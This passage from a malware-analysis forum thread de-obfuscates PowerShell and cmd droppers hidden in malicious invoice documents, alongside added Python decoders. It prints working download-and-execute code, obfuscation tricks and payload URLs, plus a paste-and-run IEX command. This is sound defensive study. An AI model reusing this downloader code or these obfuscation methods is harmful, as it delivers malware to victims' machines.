    ne=Windows!ar!!tq!!oc!\v1.0\!ar!!tq!!oc!.exe --> ne=Windowspowershell\v1.0\powershell.exe
    Now the script looks as follows:
    Code:
    cmd.exe /V /C "set ne=Windowspowershell\v1.0\powershell.exe&&echo Iyo;
    iEx(NEw-ObjECT Net.WEbcliEnT).DowNloAdsTRiNG('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR');ZFe | Windowspowershell\v1.0\powershell.exe -nop -"

    We can skip the ne, Iyo, ZFe variables and lowercase some characters:
    Code:
    cmd.exe /V /C "echo ;
    iEx(New-Object Net.Webclient).DownloadString('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR'); | Windowspowershell\v1.0\powershell.exe -nop -"

    So finally, the above script reads the content of the 'https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR' file from the malicious website (PowerShell commands) and runs it filelessly using PowerShell. This can bypass the standard PowerShell ExecutionPolicy = Restricted, so the -bypass switch is not required.
    :)(y)
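The caret stripping and !variable! expansion done by hand in the post above, as an added Python example (not code from the post): it removes cmd.exe's ^ escapes, collects the set name=value assignments, resolves the delayed-expansion references the way cmd /V would, and pulls out the text that echo writes into powershell's stdin. The sample is a shortened copy of the post's command line (the author's defanged host, with the query string dropped).

```python
import re

# Shortened copy of the command line quoted in the post above, constructed for this example:
# the host is the post author's defanged one and the Base64 query string is dropped.
SAMPLE = (
    r'cmd.exe /V /C "set ox=e^n&&set tq=^ers&&set oc=h^e^l^l&&set ar=^p^ow'
    r'&&set ne=^W^i^nd^ows!ar!!tq!!oc!\v1.^0\!ar!!tq!!oc!.e^xe&&echo ^Iyo;'
    r"^iE^x^(^N^E^w^-O^bjE^CT^ ^Net.^WE^b^c^liEn^T).^Dow^N^l^oA^d^s^TRi^N^G"
    r"('htt^p^s^:/^/a^aa^a^.aa^aaa^a^aa.co^m^/v^2/^gl.p^h^p'^);^Z^Fe | !ne! -^no^p^ ^-"
    r'"'
)

SET_RE = re.compile(r"\bset\s+(\w+)=([^&]*)", re.IGNORECASE)   # set name=value, value ends at &
VAR_RE = re.compile(r"!(\w+)!")                                  # delayed-expansion reference
PIPE_RE = re.compile(r"echo\s+(.*?)\s*\|\s*(\S*powershell\S*)", re.IGNORECASE | re.DOTALL)


def strip_carets(cmd):
    """Undo cmd.exe's ^ escape: '^x' becomes 'x', so '^^' correctly becomes one literal '^'."""
    return re.sub(r"\^(.)", r"\1", cmd, flags=re.DOTALL)


def collect_variables(flat):
    """Every 'set name=value' in the chain, with the caret escapes already removed."""
    return dict(SET_RE.findall(flat))


def expand_delayed(text, variables, max_rounds=10):
    """Resolve !name! the way cmd /V does; names that were never set are left as they are.
    Rounds are bounded so a self-referencing variable cannot loop forever."""
    for _ in range(max_rounds):
        new = VAR_RE.sub(lambda m: variables.get(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def deobfuscate_cmd(cmd):
    flat = strip_carets(cmd)
    variables = collect_variables(flat)
    # values can reference other variables (ne is built from ar, tq and oc)
    variables = {k: expand_delayed(v, variables) for k, v in variables.items()}
    expanded = expand_delayed(flat, variables)
    # what echo writes to powershell's stdin (the trailing '-' argument) is the real script
    m = PIPE_RE.search(expanded)
    return {
        "variables": variables,
        "expanded": expanded,
        "script": m.group(1) if m else None,
        "interpreter": m.group(2) if m else None,
    }


if __name__ == "__main__":
    result = deobfuscate_cmd(SAMPLE)
    for name, value in result["variables"].items():
        print(f"{name} = {value}")
    print("interpreter:", result["interpreter"])
    print("script:", result["script"])
```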
     
  4. Andy Ful

    Example from Malware Samples 27/10/17 #11
    Frage-zur-Rechnung.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Frage-zur-Rechnung'
    Code:
    $EncodedString='36!119R115<99c114%105@112%116U32@61R32R110R101U119U45c111A98!106:101R99U116U32F45F67F111R109R79<98A106<101<99@116F32U87%83R99@114c105F112c116%46!83%104c101c108F108%59A36U119!101c98A99F108c105c101!110c116<32@61F32<110@101<119%45R111%98U106%101F99:116U32R83%121@115!116:101U109<46A78R101:116F46c87A101:98R67%108<105:101R110A116<59<36R114@97c110@100!111%109<32R61:32!110U101c119!45c111@98%106%101!99!116:32%114F97R110%100c111U109U59U36:117@114@108R115A32@61<32:39R104R116@116%112U58@47F47R103:117!121R115R102R114c111A109%97:110%100!114F111c109U101U100%97:46R99:111!109A47@71@104R81A120A73<80@47R44R104R116!116%112U58F47%47R109c97<116c101R114:105%97<108U115:116A101A115c116@105!110R103A101F113<117%105@112%46A99R111<109@47A111R47:44A104%116:116F112F58R47<47%108!99@116@110c46@111c114%103%47%78U71R76A67%87c83<116%85F99<47@44:104@116R116F112@58<47<47!112!114<111@109@97<99U107:115R102@97U114!109<46@99:111F109<47c90<71R79F120@115@74<109@110R120%47c44U104%116F116:112<58%47!47@102F111<117R114A99:104@97A109:98F101R114R102<111@114F103<101!46F99F111R109!47c76@84%87R100!70A117:78<47@39<46U83:112R108F105<116@40!39U44F39U41<59U36R110@97%109c101<32!61!32:36:114A97U110@100c111F109@46F110A101<120!116R40@49%44A32U54%53!53!51R54c41:59%36F112!97R116U104:32!61c32:36U101U110!118R58c116<101R109<112:32@43%32c39%92<39%32@43R32R36c110%97@109c101@32A43@32!39R46:101U120@101F39%59F102R111@114<101:97:99F104@40R36@117%114!108<32<105A110<32R36<117:114c108A115R41F123<116A114%121F123F36R119R101A98@99A108@105R101U110!116<46R68!111F119!110c108U111c97%100:70R105R108:101:40U36U117@114c108%46R84<111A83A116@114c105A110:103%40U41@44:32@36c112:97R116F104%41R59F83U116!97U114:116U45F80:114A111!99F101@115U115A32U36:112c97<116%104<59<98U114:101<97!107%59c125%99R97c116@99%104F123%119:114R105A116!101<45U104R111:115U116F32%36@95c46%69<120:99c101@112F116R105%111:110:46@77:101A115%115:97!103R101F59:125!125'
    $obfuscatingCharacters = '@c:%!UR;A<F'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated script commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaa.com/GhQxIP/,http://bbb.../,http://eeeee.com/LTWdFuN/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    The usual pattern. :)
     
  5. Andy Ful

    First example from Malware Samples 30/10/17 #13.

    Payment enclosed.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Payment enclosed.doc'
    Code:
    $EncodedString='36W119W115k99B114-105-112U116B32B61k32U110k101B119R45R111G98-106%101R99G116%32p45G67%111W109T79%98p106T101U99T116k32B87G83U99B114%105T112U116U46R83k104R101T108T108U59U36U119%101G98-99B108W105T101U110-116U32W61W32k110R101T119T45%111B98-106W101R99p116U32-83%121U115W116-101G109G46k78U101T116B46B87U101T98p67W108-105T101k110T116W59W36R114U97k110k100R111T109G32p61G32U110T101R119G45G111k98k106U101%99-116-32-114-97G110R100p111W109k59B36%117U114T108U115G32G61-32B39-104%116k116U112B58p47U47%99W122G101G117U99-104G46-100W101R47U115p69R83U82-112k122k105R66k76U85B47T44%104U116U116-112U58U47W47B104k97k117B108U101R114p46R100W101-47%87B103W90k83B78-75k112T47%44k104U116W116W112k58k47U47%97G98T103R101R115k111p102G102W101B110k46U110-101W116U47p108-68R97-113W119p47R44B104B116%116%112%58k47p47p99U104W114k105p115p115k105p103p110R46-99B111%109W47%83%102-88k83-74W110p109k84W71R102k47W44-104G116p116%112-58U47W47p97p108T97W110%99W111R117R110T116R114p121%46B102W114U47%101R85B97%83k117U104k66%98-47-39R46R83B112k108k105G116-40R39B44G39%41R59-36p110R97U109%101G32%61R32B36T114W97-110T100%111B109-46G110-101U120R116R40p49R44-32R54p53%53W51T54B41G59p36W112U97k116k104W32R61W32T36%101G110R118-58p116B101p109k112R32T43T32B39T92T39G32U43B32B36k110p97k109k101R32W43R32%39U46R101W120-101W39-59W102G111W114p101R97U99T104G40U36T117R114k108U32B105B110G32p36%117W114W108-115k41-123G116p114p121k123k36-119B101-98T99-108R105W101-110-116T46W68-111U119k110k108k111B97U100B70U105%108k101%40-36B117k114B108p46T84U111T83W116B114W105W110%103k40k41U44p32B36p112k97-116R104G41T59%83B116B97%114G116k45B80-114W111U99B101-115%115W32T36%112B97G116-104k59T98W114p101%97p107G59k125k99B97B116B99%104T123B119U114k105-116p101U45%104G111W115-116U32R36G95R46B69k120G99p101p112-116U105k111-110U46T77-101W115p115T97R103-101p59k125p125'
    $obfuscatingCharacters = 'G%TUWR-kpB'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})

    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaaaaa.de/sESRpziBLU/,http....com/SfXSJnmTGf/,http://eeeeeeee.fr/eUaSuhBb/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

    It looks like someone used a code copier.
     
  6. lowdetection

    @Andy Ful, this video, which explains where to find fresh Malware Samples, also contains an example of what you explained up here; good work :)

     
  7. Andy Ful

    Second example from: Malware Samples 30/10/17 #13

    ctravisi.xls
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'ctravisi.xls'
    Code:
    cMd /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 33;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""
    .
    Let's lower/upper some letters (more readable code):
    Code:
    cmd /c"PowerShell -NonInteractive -NoPr -Executi Bypass -Windo Hidden "do{sleep 33;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""
    .
    De-obfuscation 1:
    \"{2}{0}{1}\" -f'-o','bject','new'
    The three strings: '-o','bject','new' (counted from 0) should be joined in the order {2}{0}{1}.
    So the string '-o' is related to {0}, the string 'bject' is related to {1} and the string 'new' is related to {2}.
    {2}{0}{1} means joining 'new' + '-o' + 'bject' = 'new-object'
    .
    De-obfuscation 2:
    Similarly the six strings 't','syst','.webclie','em','nt','.ne' (counted from 0) should be joined in the order {1}{3}{5}{0}{2}{4}:
    'syst' + 'em' + '.ne' + 't' + '.webclie' + 'nt' = 'system.net.webclient'
    .
    De-obfuscation 3:
    'd'+'ow'+'nloadfil'+'e' = 'downloadfile'
    .
    De-obfuscation 4:
    Three strings 'star','ss','t-proce' (counted from 0) should be joined in the order {0}{2}{1}:
    'star' + 't-proce' + 'ss' = 'start-process'
    .
    De-obfuscation 5:
    -NoPr --> -NoProfile
    -Executi --> -ExecutionPolicy
    -Windo --> -WindowStyle
    .
    De-obfuscated code (added some spaces):
    Code:
    cmd /c "PowerShell -NonInteractive -NoProfile -ExecutionPolicy Bypass -WindowStyle hidden "do{sleep 33;(new-object system.net.webclient).downloadfile.Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&start-process '%temp%.exe'""
    Nothing new (trojan downloader).
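    The same five de-obfuscation steps, as an added example written here in Python rather than taken from the post, so the sample is transformed statically and nothing in it is ever executed. The command it processes is a constructed copy of the post's pattern with a placeholder URL; the switch list and the operator list are assumptions.

```python
import re

# Added example, not the thread's code: resolve the string-building tricks from
# the post without executing anything.  Two patterns are handled:
#   ("{2}{0}{1}" -f 'a','b','c')   -> the quoted pieces re-ordered by index
#   'd'+'ow'+'nloadfil'+'e'         -> adjacent single-quoted literals joined
# plus expansion of abbreviated powershell.exe switches (-NoPr, -exeCuTi, -WinDO).

# "{2}{0}{1}" -f 'x','y','z'  (inside cmd /c the quotes appear escaped as \")
FORMAT_RE = re.compile(
    r"\\?\"((?:\{\d+\})+)\\?\"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')")
# 'a'+'b'+'c'  (two or more single-quoted literals joined with +)
CONCAT_RE = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")

# Assumption: this subset of powershell.exe switches is enough for these samples;
# the real binary accepts any unambiguous prefix, which is what we mimic here.
PS_SWITCHES = ["NonInteractive", "NoProfile", "NoLogo", "NoExit", "ExecutionPolicy",
               "WindowStyle", "EncodedCommand", "Command", "File", "Version"]
# Dash-prefixed tokens that are operators, never switches (-f is the format operator).
PS_OPERATORS = {"f", "eq", "ne", "join", "split", "replace", "creplace", "and",
                "or", "not", "match", "like", "in", "contains", "as", "is"}


def _resolve_format(m):
    """Re-order the quoted pieces according to the {n} placeholders."""
    order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
    pieces = re.findall(r"'([^']*)'", m.group(2))
    if max(order) >= len(pieces):
        return m.group(0)                     # malformed: leave it for the analyst
    return "'" + "".join(pieces[i] for i in order) + "'"


def _resolve_concat(m):
    """Join 'a'+'b'+'c' into a single literal."""
    return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"


def _expand_switch(m):
    prefix = m.group(1).lower()
    if prefix in PS_OPERATORS:
        return m.group(0)
    hits = [s for s in PS_SWITCHES if s.lower().startswith(prefix)]
    return "-" + hits[0] if len(hits) == 1 else m.group(0)


def deobfuscate_strings(text, max_rounds=10):
    """Apply the -f and + resolutions until the text stops changing (nested forms)."""
    for _ in range(max_rounds):
        new = CONCAT_RE.sub(_resolve_concat, FORMAT_RE.sub(_resolve_format, text))
        if new == text:
            break
        text = new
    return text


def deobfuscate_command(cmd):
    """Resolve the string tricks, then expand abbreviated switches.  Only a dash
    preceded by whitespace is a switch, so '-o' in a literal or 't-proce' is untouched."""
    return re.sub(r"(?<=\s)-([A-Za-z]+)\b", _expand_switch, deobfuscate_strings(cmd))


# Constructed sample mirroring the post's command line, with a placeholder URL.
SAMPLE_CMD = (
    r'''cmd /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 33;'''
    r'''(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne'))'''
    r'''.('d'+'ow'+'nloadfil'+'e').Invoke('https://example.invalid/modello','%temp%.exe')}while(!$?);'''
    r'''&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""'''
)

if __name__ == "__main__":
    print(deobfuscate_command(SAMPLE_CMD))
```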
     
  8. Andy Ful

    #8 Andy Ful, Nov 3, 2017
    Last edited: Nov 3, 2017
    First example from Malware Samples 3-11-17 #13.
    001_4910.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '001_4910.doc'
    Code:
    powershell.exe -nop -noexit -c "$sr = (new-object System.IO.StreamReader((([System.Net.WebRequest]::Create('https://aaaaa/Jmdnaf36dd')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
    
    .
    This example is not obfuscated, but it is interesting because it does not use the command 'new-object system.net.webclient'. Instead, 'new-object System.IO.StreamReader' and 'System.Net.WebRequest' are used to read the file 'Jmdnaf36dd' from the remote website. Next, this file is executed from memory (filelessly).
    If someone wants to see how it would work with the script Helloworld.ps1 from my GitHub website, then copy the below code, paste it into Explorer and run it like any other command:
    Code:
    powershell.exe -nop -noexit -c "$sr=(new-object System.IO.StreamReader((([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
    .
    The PowerShell console should open with 'Hello World!'. :)
     
  9. boredog

    boredog Level 8

    Jul 5, 2016
    392
    818
    Retired
    usa
    Windows 10
    Malwarebytes
    Weird, I went to register at rever.it and it gives me an error saying that this email is already registered, and I have never even been to that site before.
     
  10. Andy Ful

    Second example from: Malware Samples 3-11-17 #13.
    ZGK#SLRP (03 Nov 17).doc (6RS34PRb on hybrid-analysis.com)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '6RS34PRb'
    Code:
    $EncodedString='36O119_115S99~114O105u112~116D32S61D32m110m101m119S45;111D98D106D101S99u116u32S45I67~111m109{79m98u106O101_99{116~32I87u83u99{114D105~112S116u46{83S104O101_108u108D59D36I119~101m98m99O108m105{101_110{116O32I61_32{110~101I119~45S111_98I106~101O99_116I32_83~121~115S116_101~109S46_78{101m116S46~87D101D98{67I108m105S101;110I116m59D36;114_97m110;100{111~109;32S61I32S110I101O119D45I111m98O106S101u99u116S32O114{97u110~100S111S109m59_36{117;114D108m115D32S61m32S39I104_116;116{112u58S47S47u112{104O101O108{101I112{46;99m111~109m47_84;86D111I116O75m107O47_44u104_116~116{112{58{47{47~118I101D108I111~107;117S114m105u101m114m46m110O101u116_47O119_103D101m104D75_86m47_44O104S116_116D112O58D47m47O102~105S99O102u97D99~46m100~101I47D85m73~78_120u81D47D44I104m116~116m112_58I47I47D111{114D100_111;45u116m101u109u112;108u105S45~97S114_99m97~110_117m109{46u100I101I47O67S68D115S119{47m44~104u116S116S112u58I47{47_97m115;99I111D45m116u101O97{109{46m100_101S47~67O110;79;98_86~67u74O47_39S46~83O112~108O105{116{40D39~44{39I41S59m36_110u97~109m101m32D61~32I36D114I97{110m100u111~109_46u110{101u120_116m40~49_44{32{54;53{53~51~54I41m59S36m112u97u116m104{32I61m32{36~101m110D118u58m116u101O109I112D32~43{32m39_92~39{32D43~32I36S110~97D109u101S32{43{32u39;46O101~120O101;39I59m102~111O114D101m97u99~104D40I36{117_114S108m32u105u110I32~36_117u114{108I115_41~123u116S114;121I123I36S119m101~98D99I108S105~101S110;116S46~68_111O119I110m108u111S97S100I70~105~108S101~40~36;117O114{108;46D84I111u83;116O114O105{110S103{40m41D44I32I36S112D97;116;104S41D59_83O116m97{114D116O45O80~114I111~99I101m115I115;32D36{112D97I116S104{59{98m114u101;97m107S59D125m99u97~116I99m104S123{119;114u105u116_101m45O104{111D115~116O32O36u95O46~69_120D99m101m112~116m105S111u110O46S77I101{115~115m97D103m101I59;125m125'
    $obfuscatingCharacters = '{D_O-SI;mu~'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://aaaaa/TVotKk/,http://bbbbb/w...NxQ/,http://ddddd/CDsw/,http://eeeee/CnObVCJ/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    Another example of 'new-object System.Net.WebClient' command.:)
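    The split-cast-join decoding used in this post and in the earlier one (post #5), as an added example written in Python rather than taken from the thread, so the decoded text is only displayed and never run. It also infers the junk characters instead of reading them off by hand; the blob it decodes is constructed from a harmless command and is not the malware's string.

```python
import itertools
import re

# Added example, not the thread's code: a Python equivalent of
#   -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { [iNT] $_ -As [cHAR] })
# that never runs the decoded text.  Every piece is a decimal char code, so every
# non-digit in the blob must be a separator; that lets us infer the junk set.


def infer_delimiters(encoded):
    """All non-digit characters, sorted, e.g. '%-BGRTUWkp' for the delimiters of post #5."""
    return "".join(sorted({c for c in encoded if not c.isdigit()}))


def decode_charcode_string(encoded, delimiters=None):
    """Split on any delimiter character, cast each piece to int, then to a character.
    Empty pieces (two separators in a row) are skipped."""
    if delimiters is None:
        delimiters = infer_delimiters(encoded)
    pieces = re.split("[" + re.escape(delimiters) + "]", encoded) if delimiters else [encoded]
    return "".join(chr(int(p)) for p in pieces if p)


def is_charcode_blob(text, min_pieces=8):
    """Heuristic for spotting this encoding in a command line: mostly digits, made of
    at least min_pieces runs that all decode to printable ASCII."""
    pieces = [p for p in re.split(r"\D+", text) if p]
    if len(pieces) < min_pieces or not text:
        return False
    digits = sum(c.isdigit() for c in text)
    return digits / len(text) > 0.6 and all(32 <= int(p) <= 126 for p in pieces)


def encode_charcode_string(text, delimiters):
    """Constructed helper that builds a blob in the malware's layout (codes separated
    by the delimiter characters in rotation) so the decoder can be exercised offline."""
    seps = itertools.cycle(delimiters)
    codes = [str(ord(c)) for c in text]
    return "".join(code + (next(seps) if i < len(codes) - 1 else "")
                   for i, code in enumerate(codes))


# Constructed sample, using the same delimiter set as the script in post #5.
SAMPLE_BLOB = encode_charcode_string("Write-Host 'decoded safely'", "G%TUWR-kpB")

if __name__ == "__main__":
    print("delimiters:", infer_delimiters(SAMPLE_BLOB))
    print("decoded:   ", decode_charcode_string(SAMPLE_BLOB))
```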
     
  11. Andy Ful

    #11 Andy Ful, Nov 3, 2017
    Last edited: Nov 3, 2017
    I do not know what website you had in mind. :) Youtube or the website with malware samples?
    Edit.
    It could happen if the website had changed its name (you registered on the old website); the second alternative is not good for you.
     
  12. boredog

    I meant to type Free Automated Malware Analysis Service - powered by VxStream Sandbox

    Not sure what the old site was. Only one I download malware from now is testmyav.
     
  13. Andy Ful

  14. lowdetection

    #14 lowdetection, Nov 3, 2017
    Last edited: Nov 3, 2017
  15. upnorth

    upnorth Level 11

    Jul 27, 2015
    520
    2,759
    Sweden
  16. Andy Ful

    #16 Andy Ful, Nov 11, 2017
    Last edited: Nov 16, 2017
    The example from Malware Samples 10/11/17 #12
    New-invoice-8608859.doc (Invoice-number-943048.doc on hybrid-analysis.com)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Invoice-number-943048'
    .
    The example is interesting, because the PowerShell code is doubly obfuscated (the obfuscation code is also obfuscated), in the pattern:
    .
    (MainObfuscatedCode.(Obfuscated De-Obfuscation Commands2)).(De-Obfuscation Commands1) | (execute)
    .
    The PowerShell commands can be found in the 'Extracted Strings' section of hybrid-analysis:
    "powershell "(' & ( 0hCENV:COMSPEc[4,26,25]-JoinwVIwVI)((wVI & ( NnopshOme[21]+NnoPsHOMe[30'+']+
    wVI+wVIe'+'clXewVI+wVIcl)wVI+wVI ( (eclFk1fra'+'nc wVI+wVI= new-objecl+eclect ecl+eclSysteec'+'l+
    eclm.ewVI+wVIcl+eclNeecl+eclt.WebClie'+'ecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobe'+'cl+ecljeecl+eclct ecl+eclrandwVI+wVIom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    wVI+wVIeclophttecl+eclp:ecl+ecl//xnec'+'l+e'+'cl'+'--ecl+ecl80a'+'ecl+eclhecl+eclk9'+'a.xnwVI+
    wVIecl+ecl-ecl+ecl-p1aiecl+e'+'cl/gPhwVI+wVITZQJ/,ecl+eclhttp:/ecl+e'+'cl/beniecl+ecltecl+ecl.ecl
    +wVI+wVIeclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl'+'+ecl'+'/recl+eclemecl+
    ecloecwVI+wVIl+eclnec'+'l+eclt-britv.ruecl'+'+ecl/Uecl+e'+'cla'+'muecl+eclKMpu'+'ecl+'+'ecl/,ewVI+
    wV'+'Icl+ecwVI+wVIlh'+'ttp'+'ecl+ecl://recl+wVI+wVIeclemecl+ecloecl+eclntecl+e'+'cl-secl+
    eclhlangov.ru/Q/,htecl+e'+'cltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+eclwVI+wVIt(ecl+eclIecl+eclop,Ioecl+eclp);'+'ecl+eclFk1ecl+
    eclkarapaecl+eclwVI+wVIsecl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next'+'(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+wVI+wVI'+'eclnv;puecl+eclblic + ecl+eclIecl'+'+eclopaecl+
    eclbOIopecl+ecl '+'ecl+e'+'cl+ ecl+eclFkecl+ecl1kar'+'apasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    ecl'+'exeIop;fwVI+wVIoreach(Fkecl+ecl1'+'ec'+'l+eclaecl+eclbc ecl+eclinecl+ecl F'+'ecl+eclk1b'+'cd)'+
    '{t'+'ryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl'+'+eclownecl+eclloawVI+wVIdecl+
    eclFile(Fk1abc.ToSecl+ecltring(), FkewVI+wVIcl+e'+'cl1huas);Invokecl+eclewVI+wVI-Iec'+'l+
    ecltem(Fk1ecl+ecl'+'huas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl'+'+eclFk1_.'+'
    Exceecl+eclpecl+eclwVI+wVItion.MessagewVI+wVI;}}ecl)
    .R'+'EpLacE((w'+'VI+wVI['+'cHa'+'r]97+[cHar]98+'+'[cHar]79)wVI+wVI,eclJV'+'Lecl).RwVI+
    wVIEpLacE(eclFk1ecl,[String][cHar]36).REpLacE(wVI+wVI([cHar]73+[cHar]111+[cHar]wVI+wVI1'+'
    1wVI+wVI2),[Strin'+'wVI+wVIg][c'+'Har]39)'+' )'+' wVI).rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEP'+'laCe(wVIJVLwVI,wVIz1awVI))').RePlAcE(([CHar]119+[CHar]86+[CHar]73),[STRiNG][CHar]39)
    .RePlAcE(([CHar]122+[CHar]49+[CHar]97),'\').RePlAcE(([CHar]48+[CHar]104+[CHar]67),'$')
    |. ( $env;pUbLic[13]+$env;puBlIc[5]+'X')
    .
    The last line is an obfuscated IEX command (Invoke-Expression cmdlet). We do not want to execute the code, so the last line:
    |. ( $env;pUbLic[13]+$env;puBlIc[5]+'X')
    has to be thrown out.
    The code is a mess, so the best way is to use the slightly modified code to de-obfuscate itself.
    .
    The last three REPLACE commands contain de-obfuscation commands, but first, we have to convert Ascii characters and join them:
    .
    De-Obfuscation Commands1 --> RePlAcE(([CHar]119+[CHar]86+[CHar]73),[STRiNG][CHar]39).RePlAcE(([CHar]122+[CHar]49+[CHar]97),'\').RePlAcE(([CHar]48+[CHar]104+[CHar]67),'$')
    We obtain:
    De-Obfuscation Commands1 --> RePlAcE('wVI',"'").RePlAcE('z1a','\').RePlAcE('0hC','$')
    .
    We put the rest of the code into a string and omit the "'+'" (joining):
    Code:
    $Obfuscated =
    ' & ( 0hCENV:COMSPEc[4,26,25]-JoinwVIwVI)((wVI & ( NnopshOme[21]+NnoPsHOMe[30]+
    wVI+wVIeclXewVI+wVIcl)wVI+wVI ( (eclFk1franc wVI+wVI= new-objecl+eclect ecl+eclSysteecl+
    eclm.ewVI+wVIcl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrandwVI+wVIom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    wVI+wVIeclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xnwVI+
    wVIecl+ecl-ecl+ecl-p1aiecl+ecl/gPhwVI+wVITZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl
    +wVI+wVIeclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloecwVI+wVIl+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,ewVI+
    wVIcl+ecwVI+wVIlhttpecl+ecl://recl+wVI+wVIeclemecl+ecloecl+eclntecl+ecl-secl+
    eclhlangov.ru/Q/,htecl+ecltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+eclwVI+wVIt(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+
    eclkarapaecl+eclwVI+wVIsecl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+wVI+wVIeclnv:puecl+eclblic + ecl+eclIecl+eclopaecl+
    eclbOIopecl+ecl ecl+ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;fwVI+wVIoreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd)'+
    '{tryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloawVI+wVIdecl+
